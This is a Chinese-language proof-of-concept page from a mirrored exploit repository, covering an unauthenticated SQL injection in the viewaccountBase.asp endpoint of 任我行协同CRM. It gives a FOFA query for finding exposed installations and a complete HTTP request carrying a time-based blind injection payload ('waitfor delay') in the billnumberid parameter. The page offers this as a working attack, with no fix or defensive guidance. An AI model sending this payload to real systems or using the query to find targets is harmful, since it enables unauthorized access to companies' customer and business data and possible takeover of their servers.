admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-30 14:34:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/任我行/任我行协同CRM普及版viewaccountBase存在SQL注入漏洞.md

23 lines
1.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 任我行协同CRM普及版viewaccountBase存在SQL注入漏洞
# 一、漏洞简介
任我行CRM是CRM客户关系管理、OA自动化办公、OM目标管理、KM知识管理、HR人力资源一体化的企业管理软件。通过建立组织运营管理铁三角目标行动-企业文化-知识复制),一切围绕以客户为中心的全方位、透明化业务管理(市场-销售-生产-服务打造企业组织高效协同的运营管理平台。任我行协同CRM存在SQL注入漏洞远程未授权攻击者可利用此漏洞获取敏感信息进一步利用可能获取目标系统权限。
# 二、影响版本
+ 任我行协同CRM
# 三、资产测绘
```
fofa:app="任我行软件-管家婆分销ERP"
```
# 四、漏洞复现
```plain
GET /common/viewaccountBase.asp?TimeCheckPoint=80685.73&billnumberid=-1%20waitfor%20delay%20%270:0:8%27--&billtype= HTTP/2
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
```
Reference in New Issue View Git Blame Copy Permalink